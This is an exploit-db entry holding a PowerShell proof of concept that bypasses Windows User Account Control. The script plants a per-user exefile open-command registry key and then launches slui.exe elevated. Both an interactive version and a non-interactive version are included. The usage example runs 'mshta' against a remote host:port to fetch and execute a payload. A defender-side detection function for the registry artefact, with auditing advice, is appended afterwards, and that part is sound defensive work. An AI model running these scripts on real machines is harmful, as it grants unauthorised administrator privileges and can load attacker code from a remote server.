Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)

Reported: 17 Jun 2019 00:00:00, by Gushmazuko. Type: exploitdb. Source: www.exploit-db.com

UAC Protection Bypass via Slui File Handler Hijack (PowerShell)

Code
Interactive Version:

<#
.SYNOPSIS
	This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
	Function   : SluiHijackBypass
	File Name  : SluiHijackBypass.ps1
	Author     : Gushmazuko
.LINK
	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
	Load "cmd.exe" (By Default used 'arch 64'):
	SluiHijackBypass -command "cmd.exe" -arch 64

	Load "mshta http://192.168.0.30:4444/0HUGN"
	SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
#>

function SluiHijackBypass(){
	Param (

		[Parameter(Mandatory=$True)]
		[String]$command,
		[ValidateSet(64,86)]
		[int]$arch = 64
	)

	#Create registry structure
	New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
	Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

	#Perform the bypass
	switch($arch)
	{
		64
		{
			#x64 shell in Windows x64 | x86 shell in Windows x86
			Start-Process "C:\Windows\System32\slui.exe" -Verb runas
		}
		86
		{
			#x86 shell in Windows x64
			C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
		}
	}

	#Remove registry structure
	Start-Sleep 3
	Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
}


################################################################################


Non-Interactive Version:

<#
.SYNOPSIS
  Non-interactive version of the script, for direct execution.
  This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
	File Name  : SluiHijackBypass_direct.ps1
	Author     : Gushmazuko
.LINK
	https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
	Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
	Load "cmd.exe" (By Default used 'arch 64'):
	powershell -exec bypass .\SluiHijackBypass_direct.ps1
#>

$program = "cmd.exe"
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
#For x64 shell in Windows x64:
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
#For x86 shell in Windows x64:
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
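Added detection example, not part of the exploit-db entry or the author's WinBypass scripts: a defender-side check for the registry artefact both versions above create (the per-user `exefile\shell\open\command` key that shadows the machine-wide handler). The function name, the `-AllUsers` switch and the output fields are my own.

```powershell
# Added detection example (not from the exploit-db entry or the author's WinBypass scripts).
# Function name, parameter and output fields are my own. The exefile handler normally
# resolves from HKLM\Software\Classes (default value "%1" %*); a per-user copy under
# HKCU\Software\Classes\exefile\shell\open\command is the artefact both PoC scripts create,
# and it is what an auto-elevating binary such as slui.exe would honour.
function Find-ExefileHandlerHijack {
    [CmdletBinding()]
    Param (
        # Also inspect every loaded per-user Classes hive (HKU\<SID>_Classes), not just HKCU
        [switch]$AllUsers
    )

    $subKey   = 'exefile\shell\open\command'
    $expected = (Get-ItemProperty -Path "HKLM:\Software\Classes\$subKey" -ErrorAction SilentlyContinue).'(default)'

    # Candidate locations: HKCU\Software\Classes is a link to the current user's *_Classes hive
    $roots = @('HKCU:\Software\Classes')
    if ($AllUsers) {
        if (-not (Test-Path 'HKU:\')) {
            New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
        }
        $roots += @(Get-ChildItem 'HKU:\' |
            Where-Object { $_.PSChildName -like 'S-1-5-21-*_Classes' } |
            ForEach-Object { "HKU:\$($_.PSChildName)" })
    }

    foreach ($root in $roots) {
        $path = "$root\$subKey"
        if (-not (Test-Path $path)) { continue }   # nothing overriding the machine handler here
        $cmd = (Get-ItemProperty -Path $path -ErrorAction SilentlyContinue).'(default)'
        [PSCustomObject]@{
            Key      = $path
            Command  = $cmd
            Expected = $expected
            Finding  = 'Per-user exefile open handler present; machine-wide handler is shadowed'
        }
    }
}

# Example use on a host being triaged (other users' hives need an elevated session):
# Find-ExefileHandlerHijack -AllUsers | Format-List
```

The PoC removes the key after three seconds, so a one-off scan can miss it; pairing this check with registry auditing (object access on HKCU\Software\Classes\exefile) or a Sysmon registry event rule on the same path catches the transient write.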
